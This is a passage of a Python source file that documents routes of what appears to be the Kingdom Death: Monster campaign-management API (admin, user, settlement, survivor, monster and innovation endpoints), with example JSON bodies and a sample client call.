and requires a user have the 'admin' bit flipped on their user.</p>
""",
},
"admin_get_user_data": {
"name": "/admin/get/user_data",
"methods": ["GET","OPTIONS"],
"desc": """\
<p>Retrieves a nice, juicy hunk of JSON re: recent users of the API.</p>
""",
},
"admin_get_logs": {
"name": "/admin/get/logs",
"methods": ["GET","OPTIONS"],
"desc": """\
<p>Dumps the contents of a number of system logs from the local filesystem where
the API is running and represents them as JSON.</p>
""",
},
}
user_management = {
"user_get": {
"name": "/user/get/<user_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Retrieve a serialized version of the user who owns <user_id>,
to include some additional usage and meta facts about that user.</p>
<p>Like many of the <code><b>GET</b></code> routes supported by the KD:M API,
this route will return user info whether you use <code><b>POST</b></code> or
any other supported method.</p>
""",
},
"user_dashboard": {
"name": "/user/dashboard/<user_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>This fetches a serialized version of the user that includes the
<code>/world</code> output as well as a bunch of info about the
user, including their friends, settlements they own or are
playing in, etc.</p>
<p>Here's a run-down of the key elements:</p>
<pre><code>{
"is_application_admin": true,
"meta": {...},
"user": {...},
"preferences": [...],
"dashboard": {
"campaigns": [...],
"settlements": [...],
},
}</code></pre>
<p>The top-level <code>dashboard</code> element includes two arrays:
<code>campaigns</code> and <code>settlements</code>.</p>
<p>The <code>campaigns</code> array is a <b>reverse-chronological</b> list
of OIDs of all settlements where the user owns a survivor (i.e.
    the survivor's <code>email</code> attribute matches the user's
    <code>login</code> attribute).</p>
<p>This list can include settlements owned/created by other users:
    the basic idea behind the <code>campaigns</code> list is that
you probably want to show these settlements to the user when they
sign in or when they choose which settlement they want to view.</p>
<p>The <code>campaigns</code> array <u>does not</u> include any
'abandoned' settlements (i.e. any settlement with a Boolean True
    value for the <code>abandoned</code> attribute).</p>
<p>See <a href="/#settlementAbandon"><code>/settlement/abandon/oid</code>
(below)</a> for more on abandoning a settlement. </p>
    <p>By contrast, the <code>settlements</code> array is a
<b>chronologically</b> sorted list of all settlement OIDs that belong
to the current user, whether abandoned or not.</p>
<p>This is more of an archival/historical sort of list, meant to
facilitate that kind of view/list/UX.</p>
""",
},
"user_set": {
"name": "/user/set/<user_id>",
"subsection": "user_attribute_management",
"desc": """\
<p>This route supports the assignment of user-specified key/value
attributes to the user object.</p><p>To set an attribute, include
JSON in the body of the request that indicates the key/value to set.</p>
Supported attribute keys include:
<table class="embedded_table">
<tr><th>key</th><th>value</th></tr>
<tr>
<td>current_settlement</td>
<td class="text">
            OID of an existing, non-removed settlement.
</td>
</tr>
</table>
Use multiple key/value pairs to set multiple attributes in a single
request, e.g. <code>{"current_settlement": $oid, "current_session":
$oid}</code>
</p>
<p><b>Important!</b> This route does not support the assignment of
arbitrary keys and will completely fail any request that includes
unsupported keys!</p>
""",
},
"user_set_preferences": {
"name": "/user/set_preferences/<user_id>",
"subsection": "user_attribute_management",
"desc": """\
<p><b>POST</b> a list of hashes to this endpoint to set user preferences.</p>
<p>Your list has to be named <code>preferences</code> and your
    hashes have to be key/value pairs where the key is a valid
    preferences handle and the value is a Boolean:</p>
<code>{preferences: [{handle: "beta", value: true}, {...}]}</code>
<p>Since this is mostly a sysadmin/back-of-house kind of route,
it fails pretty easily if you try to <b>POST</b> something it doesn't
like. The good news, is that it should fail pretty descriptively.</p>
""",
},
"user_add_expansion_to_collection": {
"name": "/user/add_expansion_to_collection/<user_id>",
"subsection": "user_collection_management",
"desc": """\
<p>You can <b>POST</b> a single expansion handle to this endpoint
to add it to a user's collection of expansions:</p>
<code>{handle: "manhunter"}</code>
""",
},
"user_rm_expansion_from_collection": {
"name": "/user/rm_expansion_from_collection/<user_id>",
"subsection": "user_collection_management",
"desc": """\
<p><b>POST</b> some basic JSON to this endpoint to remove an expansion handle
from a user's collection:</p>
<code>{handle: "flower_knight"}</code>
""",
},
}
create_assets = {
"new_settlement": {
"name": "/new/settlement",
"methods": ["POST","OPTIONS"],
"desc": """\
<p>Use 'handle' values from the <code>/game_asset/new_settlement</code>
route (see above) as params, like this:</p>
<code><pre>{
"campaign": "people_of_the_lantern",
"expansions": ["dung_beetle_knight", "lion_god"],
"survivors": ["adam", "anna"],
"name": "Chicago",
"special": ["create_first_story_survivors"]
}</pre></code>
<p>If successful, this route returns a serialized version of the new settlement,
including its OID, as JSON.</p>
<p>The following <code>special</code> values are supported by the API:</p>
<table class="embedded_table">
<tr><th>value</th><th>result</th></tr>
<tr>
<td class="key">create_first_story_survivors</td>
<td class="value">Creates two male and two female survivors,
assigns them names and places Founding Stones and Cloths in
Settlement Storage.</td>
</tr>
<tr>
<td class="key">create_seven_swordsmen</td>
<td class="value">Creates seven random survivors with the
'Ageless' and Sword Mastery A&Is. </td>
</tr>
</table>
<p><b>Important!</b> Unsupported <code>special</code> values are ignored.</p>\
""",
},
"new_survivor": {
"name": "/new/survivor",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p>This works differently from <code>/new/settlement</code> in
a number of significant ways.</p>
<p> In a nutshell, the basic idea here is that the only required key
in the JSON you <b>POST</b> to this route is an object ID for the settlement
to which the survivor belongs:</p>
<code>{'settlement': '59669ace4af5ca799c968c94'}</code>
<p> Beyond that, you are free to supply any other attributes of the
survivor, so long as they comply with the data model for survivors.</p>
<p> Consult the <a href="/#survivorDataModel">Survivor Data Model (below)</a> for a
complete reference on what attributes of the survivor may be set at
creation time.</p>
<p>As a general piece of advice, it typically makes more sense to
just initialize a new survivor with defaults and then operate on it
    using the routes below, unless you're doing something with inheritance.</p>
<p>For normal inheritance, simply <b>POST</b> the OID's of one or
more of the survivor's parents like so:</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff'}</code>
<p>...or like so:</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff', mother: '5a3419c64af5ca11240f519f'}</code>
<p>This will cause normal inheritance rules to be triggered when the
new survivor is created.</p>
<p>In order to trigger conditional or special inheritance, e.g. where
an innovation requires the user to select a single parent as the donor,
you <u>must</u> specify which parent is the donor using the <code>
primary_donor_parent</code> key and setting it to 'father' or 'mother':</p>
<code>{settlement: '59669ace4af5ca799c968c94', father: '5a341e6e4af5ca16907c2dff', mother: '5a3419c64af5ca11240f519f', primary_donor_parent: 'father'}</code>
<p>This will cause innovations such as <b>Family</b> to use the primary
donor parent to follow one-parent inheritance rules for that innovation.</p>
<p>As of API releases > 0.77.n, survivors can be created with an avatar.
    Include the <code>avatar</code> key in the <b>POST</b> body, and let
that key's value be a string representation of the image that should
be used as the survivor's avatar.</p>
<p>(<a href="/#setAvatarAnchor">See <code>/survivor/set_avatar/<oid></code> route below</a> for more
    information on how to post string representations of binary content.)</p>
    <p><b>Important!</b> Just like the <code>/new/settlement</code> route,
a successful <b>POST</b> to the <code>/new/survivor</code> route will return
a serialized version (i.e. JSON) of the new survivor, complete with
the <code>sheet</code> element, etc.</p>
""",
},
"new_survivors": {
"name": "/new/survivors",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p>Not to be confused with <code>/new/survivor</code> (above),
this route adds multiple new survivors, rather than just one.</p>
<p>The JSON you have to <b>POST</b> to this route is a little different
and more limited than what you would post to <code>/new/survivor</code>.</p>
<p>The following <b>POST</b> key/value pairs are the only ones supported
by this route:</p>
<table class="embedded_table">
<tr><th>key</th><th>O/R</th><th>value type</th><th>comment</th>
<tr>
<td>settlement_id</td>
<td><b>R</b></td>
<td>settlement OID</td>
<td class="text">The OID of the settlement to which the new survivors belong.</td>
</tr>
<tr>
<td>public</td>
<td>O</td>
<td>boolean</td>
<td class="text">
The value of the new survivors'<code>public</code> attribute.
Defaults to <code>true</code>.
</td>
</tr>
<tr>
<td>male</td>
<td>O</td>
<td>arbitrary int</td>
<td class="text">The number of male survivors to create.</td>
</tr>
<tr>
<td>female</td>
<td>O</td>
<td>arbitrary int</td>
<td class="text">The number of female survivors to create.</td>
</tr>
<tr>
<td>father</td>
<td>O</td>
<td>survivor OID</td>
<td class="text">The OID of the survivor that should be the father of the new survivors.</td>
</tr>
<tr>
<td>mother</td>
<td>O</td>
<td>survivor OID</td>
<td class="text">The OID of the survivor that should be the mother of the new survivors.</td>
</tr>
</table>
<p>Creating new survivors this way is very simple. This JSON, for
example, would create two new male survivors:</p>
<code>{"male": 2, "settlement_id": "5a1485164af5ca67035bea03"}</code>
<p>A successful <b>POST</b> to this route always returns a list of
serialized survivors (i.e. the ones that were created), so if
you are creating more than four or five survivors, this route is
a.) going to take a couple/few seconds to come back to you and b.)
is going to drop a pile of JSON on your head. YHBW.</p>
<p>NB: this route <i>does not</i> support random sex assignment.</p>
""",
},
}
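# Illustrative call for /new/settlement (documented above; host inferred from
# this file's repo path, body trimmed from the example JSON):
#   curl -X POST -H "Authorization: $JWT" -H "Content-Type: application/json" \
#        -d '{"campaign": "people_of_the_lantern", "name": "Chicago"}' \
#        https://api.thewatcher.io/new/settlement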
settlement_management = {
"settlement_get_settlement_id": {
"name": "/settlement/get/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p> Retrieve a serialized version of the settlement associated
with <settlement_id> (to include all related user and game
assets, including survivors).</p>
<p><b>Important!</b> Depending on the number of expansions, survivors,
users, etc. involved in a settlement/campaign, this one can take a
long time to come back (over 2.5 seconds on Production hardware).
YHBW</p>
""",
},
"settlement_get_summary_settlement_id": {
"name": "/settlement/get_summary/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Get a nice, dashboard-friendly summary of a settlement's info.</p>
<p>This route is optimized for speedy returns, e.g. the kind you want when
showing a user a list of their settlements.</p>
""",
},
"settlement_get_campaign_settlement_id": {
"name": "/settlement/get_campaign/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>Retrieve a serialized version of the settlement where the
<code>user_assets</code> element includes the <code>groups</code>
list, among other things, and is intended to be used in creating
'campaign' type views.</p>
<p>Much like the big <code>get</code> route for settlements, this one
can take a while to come back, e.g. two or more seconds for a normal
settlement. YHBW.</p>
""",
},
"settlement_get_sheet_settlement_id": {
"name": "/settlement/get_sheet/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>A convenience endpoint that only returns the settlement's <code>sheet</code>
element, i.e. the dictionary of assets it owns.</p>
""",
},
"settlement_get_game_assets_settlement_id": {
"name": "/settlement/get_game_assets/<settlement_id>",
"methods": ["GET", "OPTIONS"],
"desc": """\
<p>A convenience endpoint that only returns the serialized settlement's <code>
game_assets</code> element, i.e. the JSON representation of the game assets
(gear, events, locations, etc.) required to represent the settlement. </p>
""",
},
"settlement_get_event_log_settlement_id": {
"name": "/settlement/get_event_log/<settlement_id>",
"subsection": "settlement_component_gets",
"desc": """\
<p><b>GET</b> this end point to retrieve all settlement event log
entries (in a giant hunk of JSON) in <u>reverse chronological
order</u>, i.e. latest first, oldest last.</p>
<p>PROTIP: For higher LY settlements this can be a really huge
list and take a long time to return: if you're a front-end
developer, definitely consider loading this one AFTER you have
rendered the rest of your view.</p>
<p>Another way to optimize here is to include a filter key/value
pair in your <b>POST</b> body to limit your results. Some of the
accepted filter params will decrease the time it takes for your
requested lines to come back from the API:
<table class="embedded_table">
<tr><th>key</th><th>value type</th><th>scope</th></tr>
<tr>
<td>lines</td>
<td>arbitrary int</td>
<td class="text">Limit the return to the last <code>lines</code>-worth of lines: <code>{lines: 1
0}</code>. Note that this <u>does not</u> make the query or the return time better or faster for settlements with large event logs.</td>
</tr>
<tr>
<td>ly</td>
<td>arbitrary int</td>
<td class="text">
Limit the return to event log lines created <u>during</u> an arbitrary Lantern Year, e.g. <code>{ly: 9}</code>.<br/>
Note:
<ul class="embedded">
<li>This will always return <i>something</i> and you'll get an empty list back for Lantern Years with no events.</li>
<li>This param triggers a performance-optimized query and will return faster than a general call to the endpoint with no params.</li>
</ul>
</td>
</tr>
<tr>
<td>get_lines_after</td>
<td>event log OID</td>
<td class="text">Limit the return to event log lines created <u>after</u> an event log OID: <cod
e>{get_lines_after: "5a0370b54af5ca4306829050"}</code></td>
</tr>
<tr>
<td>survivor_id</td>
<td>arbitrary survivor's OID</td>
<td class="text">Limit the return to event log lines that are tagged with a survivor OID: <code>
{survivor_id: "5a0123b54af1ca42945716283"}</code></td>
</tr>
</table>
<p><b>Important!</b> Though the API will accept multiple filter
params at this endpoint, <b>POST</b>ing more than one of the
above can cause...unexpected output. YHBW.</p>
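<p>One practical pattern is to tail the log rather than re-download
it: remember the OID of the last line you rendered and hand it back
via <code>get_lines_after</code>. A sketch (URL shape and auth header
assumed, as above):</p>
<pre><code>import requests

API = "https://api.example.com"  # hypothetical deployment root

def poll_event_log(settlement_id, last_seen_oid, token):
    # fetch only the lines created after the last one we displayed
    return requests.post(
        API + "/settlement/get_event_log/" + settlement_id,
        headers={"Authorization": token},
        json={"get_lines_after": last_seen_oid},
    ).json()</code></pre>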
""",
},
"settlement_get_storage_settlement_id": {
"name": " /settlement/get_storage/<settlement_id>",
"methods": ['GET','OPTIONS'],
"subsection": "settlement_component_gets",
"desc": """\
<p>Hit this route to get representations of the settlement's storage.</p>
<p>What you get back is an array with two dictionaries, one for resources
and one for gear:</p>
<pre><code>[
{
"storage_type": "resources",
"total":0,
"name":"Resource",
"locations": [
{
"bgcolor":"B1FB17",
"handle":"basic_resources",
"name":"Basic Resources",
"collection": [
{
"handle":"_question_marks",
"name":"???",
"rules":[],
"consumable_keywords": ["fish","consumable","flower"],
"type_pretty": "Resources",
"keywords": ["organ","hide","bone","consumable"],
"desc":"You have no idea what monster bit this is. Can be used as a bone, organ, or hide!",
"type":"resources",
"sub_type":"basic_resources",
"quantity":0,"flippers":false
},
...
],
...
},
},
]</code></pre>
<p>This JSON is optimized for representation via AngularJS, i.e. iteration over
nested lists, etc.</p>
<p>Each dictionary in the main array has an array called <code>locations</code>,
which is a list of dictionaries where each dict represents a location within the
settlement.</p>
<p>Each location dictionary has an array called <code>collection</code> which is
a list of dictionaries where each dictionary is a piece of gear or a resource.</p>
<p>The attributes of the dictionaries within the <code>collection</code> array
include the <code>desc</code>, <code>quantity</code>, etc. of an individual
game asset (piece of gear or resource or whatever).</p>
""",
},
"settlement_abandon_settlement_id": {
"name": "/settlement/abandon/<settlement_id>",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p>Hit this route with a <b>POST</b> to mark the settlement as abandoned.</p>
<p>Your <b>POST</b> does not need to contain anything, but it does need
to be a <b>POST</b> (<b>GET</b> requests will not abandon the settlement).</p>
<p>An abandoned settlement has a date/time stamp of when it was
abandoned as its <code>abandoned</code> attribute and you can use this in your
UI to separate it out from active settlements.</p>
""",
},
"settlement_remove_settlement_id": {
"name": "/settlement/remove/<settlement_id>",
"methods": ["POST", "OPTIONS"],
"desc": """\
<p><b>POST</b> (not <b>GET</b>) to this route to mark the settlement as
removed.</p>
<p>Once marked as removed, settlements are queued up by the API for removal
from the database: the next time the maintenance process runs, it will check
the timestamp of the mark-as-removed event and purge the settlement
(and all survivors) from the database.</p>
<p><b>This cannot be undone.</b></p>
""",
},
#
# settlement SET attributes
#
"settlement_set_last_accessed_settlement_id": {
"name": "/settlement/set_last_accessed/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>This endpoint allows you to set the settlement's <code>last_accessed</code>
attribute, which is used in dashboard reporting, etc. </p>
<p><b>POST</b>ing an empty JSON payload to this will cause the settlement's
<code>last_accessed</code> value to be set to now.</p>
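<p>For example, this is a complete, valid <b>POST</b> body for this
endpoint:</p>
<code>{}</code>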
""",
},
"settlement_set_name_settlement_id": {
"name": "/settlement/set_name/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p><b>POST</b> some JSON whose body contains the key 'name' and whatever the
new name is going to be as that key's value to change the settlement's
name:</p>
<code>{'name': 'The Black Lantern'}</code>
<p><b>Important!</b> Submitting an empty string will cause the API to
default the settlement's name to "UNKNOWN". There are no technical
reasons (e.g. limitations) for this, but it breaks the display in most
client apps, so null/empty names are forbidden.</p>
""",
},
"settlement_set_attribute_settlement_id": {
"name": "/settlement/set_attribute/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p><b>POST</b> some basic JSON containing an 'attribute' and a 'value'
key where 'attribute' is an integer settlement attrib and 'value' is
the new value:</p>
<code>{'attribute': 'survival_limit', 'value': 3}</code>
<p> This route also supports incrementing the <code>population</code>
and <code>death_count</code> attributes. </p>
""",
},
"settlement_set_inspirational_statue_settlement_id": {
"name": "/settlement/set_inspirational_statue/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Set the settlement's <code>inspirational_statue</code> attrib
by <b>POST</b>ing a Fighting Art handle to this route:</p>
<code>{'handle': 'leader'}</code>
<p>This route will actually check out the handle and barf on you
if you try to <b>POST</b> an unrecognized FA handle to it. YHBW.</p>
""",
},
"settlement_set_lantern_research_level_settlement_id": {
"name": "/settlement/set_lantern_research_level/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Set the Settlement's Lantern Research Level with some basic
JSON:</p>
<code>{'value': 3}</code>
<p>This route is preferable to a generic attribute-setting route
because it a.) ignores values over 5 and b.) forces the attrib,
which is not part of the standard data model, to exist if it does
not.</p>
<p>Definitely use this instead of <code>set_attribute</code>.</p>
""",
},
"settlement_update_set_lost_settlements_settlement_id": {
"name": "/settlement/set_lost_settlements/<settlement_id>",
"subsection": "settlement_set_attribute",
"desc": """\
<p>Use this route to set a settlement's Lost Settlements total.</p>
<p><b>POST</b> some JSON containing the new value to set it to:</p>
<code>{"value": 2}</code>
<p>The above code would set the settlement's Lost Settlements total
to two; negative numbers will default to zero. </p>
""",
},
#
# settlement UPDATE attributes
#
"settlement_update_attribute_settlement_id": {
"name": "/settlement/update_attribute/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p><b>POST</b> some JSON containing an 'attribute' and a 'modifier'
key where 'attribute' is an integer settlement attrib and 'modifier' is
how much you want to increment it by:</p>
<code>{'attribute': 'death_count', 'modifier': -1}</code>
<p> This route also supports incrementing the <code>survival_limit
</code> and <code>death_count</code> attributes.</p>
""",
},
"settlement_update_population_settlement_id": {
"name": "/settlement/update_population/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p><b>POST</b> some JSON containing the key 'modifier' whose value is
an integer that you want to add to the settlement's population
number.<p>
<p>This works basically identically to the <code>update_attribute</code>
route, so consider using that route instead.</p>
<p>For example, this JSON would add two to the settlement's
population number:</p>
<code>{'modifier': 2}</code>
<p><b>POST</b> negative numbers to decrease.</p>
<p><b>Important!</b> Settlement population can never go below zero:
any 'modifier' value that would take the total below zero simply
sets it to zero.</p>\
""",
},
"settlement_replace_game_assets_settlement_id": {
"name": "/settlement/replace_game_assets/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>This route functions nearly identically to the other update-type routes in
this subsection, except for one crucial difference: it works on list-type
attributes of the settlement (whereas the others mostly work on string or
integer type attributes).</p>
<p>This route accepts a list of <code>handles</code> and a <code>type</code>
of game asset and then evaluates the settlement's current handles of that type,
removing and adding as necessary in order to bring the settlement's list in sync
with the incoming list. </p>
<p>Your POST body needs to define the attribute <code>type</code>
you're trying to update, as well as provide a list of handles
that represent the settlement's current asset list:</p>
<pre><code>{
"type": "locations",
"handles": [
"lantern_hoard","bonesmith","organ_grinder"
]
}</code></pre>
<p>Finally, a couple of tips/warnings on this route:<ul>
<li>The <code>handles</code> list/array is handled by the API as if it were a set, i.e. duplicates are silently ignored.</li>
<li>If any part of the update fails (i.e. individual add or remove operations), the whole update will fail and <u>no changes to the settlement will be saved</u>.</li>
<li>This route does not support Location or Innovation levels! (Use <code>set_location_level</code> or <code>set_innovation_level</code> for that.)</li>
</ul></p>
""",
},
"settlement_update_endeavor_tokens_settlement_id": {
"name": "/settlement/update_endeavor_tokens/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>Use this route to change a settlement's endeavor token count.</p>
<p><b>POST</b> some JSON containing the number to modify by:</p>
<code>{"modifier": 2}</code>
<p>The above code would add two to the settlement's current total,
whereas the code below would decrement by one:</p>
<code>{"modifier": -1}</code>
""",
},
"settlement_update_toggle_strain_milestone_settlement_id": {
"name": "/settlement/toggle_strain_milestone/<settlement_id>",
"subsection": "settlement_update_attribute",
"desc": """\
<p>You may <b>POST</b> some JSON containing the key <code>handle</code>
and the value of a strain milestone handle to toggle that strain
milestone on or off for the settlement:</p>
<code>{"handle": "ethereal_culture_strain"}</code>
<p>The API will fail if unknown <code>handle</code> values are <b>POST</b>ed.</p>
""",
},
#
# bulk survivor management
#
"settlement_update_survivors_settlement_id": {
"name": "/settlement/update_survivors/<settlement_id>",
"subsection": "settlement_manage_survivors",
"desc": """\
<p>Use this route to update a specific group of survivors, e.g.
Departing survivors.</p>
<p><b>POST</b> some JSON including the type of survivors to include,
the attribute to modify, and the modifier:</p>
<code>{include: 'departing', attribute: 'Insanity', modifier: 1}</code>
<p><b>Important!</b> This route currently only supports the
<code>include</code> value 'departing' and will error/fail/400 on
literally anything else.</p>\
""",
},
#
# settlement: manage expansions
#
"settlement_update_add_expansions_settlement_id": {
"name": "/settlement/add_expansions/<settlement_id>",
"subsection": "settlement_manage_expansions",
"desc": """\
<p>Add expansions to a settlement by <b>POST</b>ing a list of expansion handles.
The body of your post should be a JSON-style list:</p>
<code>{'expansions': ['beta_challenge_scenarios','dragon_king']}</code>
<p>
Note that this route not only updates the settlement sheet, but also
adds/removes timeline events and updates the settlement's available game
assets (e.g. items, locations, etc.).
</p>
""",
},
"settlement_update_rm_expansions_settlement_id": {
"name": "/settlement/rm_expansions/<settlement_id>",
"subsection": "settlement_manage_expansions",
"desc": """\
<p>Remove expansions from a settlement by <b>POST</b>ing a list of
expansion handles. The body of your post should be a JSON-style
list:</p>
<code>{'expansions': ['manhunter','gorm','spidicules']}</code>
<p>
Note that this route not only updates the settlement sheet, but also
adds/removes timeline events and updates the settlement's available game
assets (e.g. items, locations, etc.).
</p>
<p><b>Important!</b> We're all adults here, and the KDM API will
<i>not</i> stop you from removing expansion handles for expansions
that are required by your settlement's campaign. If you want to
prevent users from doing this, that's got to be part of your UI/UX
considerations.</p>
""",
},
#
# settlement: manage monsters
#
"settlement_set_current_quarry_settlement_id": {
"name": "/settlement/set_current_quarry/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p>This route sets the settlement's 'current_quarry' attribute,
which is the monster that the settlement's Departing Survivors are
currently hunting.</p><p><b>POST</b> some simple JSON containing a monster
name (do not use handles for this):</p>
<code>{'current_quarry': 'White Lion Lvl 2'}</code>
<p>...or, if the monster is unique:</p>
<code>{'current_quarry': 'Watcher'}</code>
<p><b>Important!</b> You're typically going to want to pull monster
names from the settlement's <code>game_assets -> defeated_monsters</code>
list (which is a list of monster names created for the settlement
based on expansion content, etc.)</p>
""",
},
"settlement_add_defeated_monster_settlement_id": {
"name": "/settlement/add_defeated_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> a 'monster' string to this route to add it to the
settlement's list of defeated monsters:</p>
<code>{'monster': 'White Lion (First Story)'}</code> or
<code>{'monster': 'Flower Knight Lvl 1'}</code>
<p><b>Important!</b> Watch the strings on this one and try to avoid
free text: if the API cannot parse the monster name and match it to
a known monster type/name, this will fail.</p>
""",
},
"settlement_rm_defeated_monster_settlement_id": {
"name": "/settlement/rm_defeated_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> a 'monster' string to this route to remove it from the
settlement's list of defeated monsters, i.e. the <code>sheet.defeated_monsters</code>
array/list: </p>
<code>{'monster': 'Manhunter Lvl 4'}</code>
<p>Attempts to remove strings that do NOT exist in the list will
not fail (i.e. they will be ignored and fail 'gracefully').</p>
""",
},
"settlement_add_monster_settlement_id": {
"name": "/settlement/add_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p>Use this route to add quarry or nemesis type monsters to the
settlement. <b>POST</b> some JSON containing the handle of the monster to
add it:</p>
<code>{'handle': 'flower_knight'}</code>
<p>The API will determine whether the monster is a nemesis or a quarry
and add it to the appropriate list. For nemesis monsters, use the
<code>/settlement/update_nemesis_levels</code> route (below) to manage
the checked/completed levels for that nemesis.</p>
<p>Make sure to check the settlement JSON <code>game_assets.monsters</code>
and use the correct handle for the desired monster.</p>
""",
},
"settlement_rm_monster_settlement_id": {
"name": "/settlement/rm_monster/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p><b>POST</b> some JSON containing a quarry or nemesis type monster handle
to remove it from the settlement's list:</p>
<code>{'handle': 'sunstalker'}</code>
<p>The API will determine whether the monster is a quarry or a nemesis.
When a nemesis monster is removed, its level detail is also removed.</p>
""",
},
"settlement_update_nemesis_levels_settlement_id": {
"name": "/settlement/update_nemesis_levels/<settlement_id>",
"subsection": "settlement_manage_monsters",
"desc": """\
<p>Use this method to update the Settlement sheet's <code>nemesis_encounters</code>
dictionary, i.e. to indicate that a nemesis encounter has occurred.</p>
<p>A typical dictionary might look like this:</p>
<code> "nemesis_encounters": {"slenderman": [], "butcher": [1,2]}</code>
<p>In this example, the settlement has (somehow) encountered a
level 1 and a level 2 Butcher, but has not yet encountered a Slenderman.</p>
<p>To update the dictionary, <b>POST</b> some JSON that includes the
nemesis monster's handle and the levels that are complete.</p>
<p><b>POST</b> this JSON to reset/undo/remove Butcher encounters:<p>
<code>{"handle": "butcher", "levels": []}</code>
<p><b>POST</b> this JSON to record an encounter with a level 1 Manhunter:</p>
<code>{"handle": "manhunter", "levels": [1]}</code>
""",
},
"settlement_add_milestone_settlement_id": {
"name": "/settlement/add_milestone/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> a milestone handle (get it from <code>game_assets</code>)
to this route to add it to the settlement's list of milestones:</p>
<code>{handle: 'game_over'}</code>
<p>...or...</p>
<code>{handle: 'innovations_5'}</code>
<p>This endpoint will gracefully fail and politely ignore dupes.</p>
""",
},
"settlement_rm_milestone_settlement_id": {
"name": "/settlement/rm_milestone/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> a milestone handle (get it from <code>game_assets</code>) to this
route to remove it from the settlement's list of milestones:</p>
<code>{handle: 'pop_15'}</code>
<p>...or...</p>
<code>{handle: 'first_death'}</code>
<p>This endpoint will gracefully fail and politely ignore attempts to remove
handles that are not present.</p>
""",
},
"settlement_set_principle_settlement_id": {
"name": "/settlement/set_principle/<settlement_id>",
"subsection": "settlement_manage_principles",
"desc": """\
<p><b>POST</b> some JSON to this route to set or unset a settlement principle.
Provide the handle of the <code>principle</code> and the election you want to
make:</p>
<pre><code>
{
principle: 'conviction',
election: 'romantic',
}</code></pre>
<p>This route has a couple of unusual behaviors to note:</p>
<ul>
<li>It requires both keys (i.e. you will get a 400 back if you
<b>POST</b> any JSON that does not include both).</li>
<li>It will accept a Boolean for 'election', because this is how
you 'un-set' a principle.</li>
</ul>
<p> To un-set a principle, simply post the principle handle and set the
<code>election</code> key to 'false':</p>
<code>{principle: 'new_life', election: false}</code>
<p> <b>Important!</b> Adding principles to (or removing them from) a
settlement automatically modifies all current survivors, in many
cases. If you've got survivor info up on the screen when you set a principle,
be sure to refresh any survivor info after <b>POST</b>ing JSON to this route!
</p>\
""",
},
#
# location controls
#
"settlement_add_location_settlement_id": {
"name": "/settlement/add_location/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p> <b>POST</b> a location <code>handle</code> to this route to add
it to the settlement's Locations:</p>
<code>{'handle': 'bone_smith'}</code>
""",
},
"settlement_rm_location_settlement_id": {
"name": "/settlement/rm_location/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p>This is basically the reverse of <code>add_location</code>
and works nearly identically. <b>POST</b> a JSON representation of a
Location handle to remove it from the settlement's list:</p>
<code>{'handle': 'barber_surgeon'}</code>
""",
},
"settlement_set_location_level_settlement_id": {
"name": "/settlement/set_location_level/<settlement_id>",
"subsection": "settlement_manage_locations",
"desc": """\
<p>For Locations that have a level (e.g. the People of the
Sun's 'Sacred Pool'), you may set the Location's level by posting
the <code>handle</code> of the location and the desired level:</p>
<code>{'handle': 'sacred_pool', 'level': 2}</code>
""",
},
#
# innovation controls
#
"settlement_get_innovation_deck_settlement_id": {
"name": "/settlement/get_innovation_deck/<settlement_id>",
"subsection": "settlement_manage_innovations",
"desc": """\
<p>Retrieve the settlement's current innovation deck as an array of asset names
by default.</p>
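<p>In that default mode the return is simply an array of names, e.g.
<code>["Albedo", "Bed", "Symposium"]</code> (the same innovations shown
in the hash below).</p>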
<p>Alternately, you can <b>POST</b> the parameter
<code>return_type: "dict"</code> to this endpoint to get a hash of innovations
(representing the settlement's Innovation Deck) back from this endpoint.</p>
<p>In the hash, innovation assets are sorted by their name (i.e. <i>not</i>
by their handle):<p>
<pre><code>{
"albedo": {
"handle": "albedo",
"name": "Albedo",
"consequences": [
"citrinitas"
],
"endeavors": [
"gorm_albedo"
],
"expansion": "gorm",
"type_pretty": "Innovations",
"sub_type_pretty": "Expansion",
"type": "innovations",
"sub_type": "expansion",
"innovation_type": "science"
},
"bed": {
"handle": "bed",
"name": "Bed",
"type": "innovations",
"endeavors": [
"bed_rest"
],
"type_pretty": "Innovations",
"sub_type_pretty": "Innovation",
"survival_limit": 1,
"sub_type": "innovation",
"innovation_type": "home"
},
...
"symposium": {
"handle": "symposium",
"name": "Symposium",
"consequences": [
"nightmare_training",
"storytelling"
],
"type": "innovations",
"settlement_buff": "When a survivor innovates, draw an additional 2 Innovation Cards to choose from.",
"type_pretty": "Innovations",
"sub_type_pretty": "Innovation",
"survival_limit": 1,
"sub_type": "innovation",
"innovation_type": "education"
}
}
</code></pre>
""",
},
"settlement_add_innovation_settlement_id": {
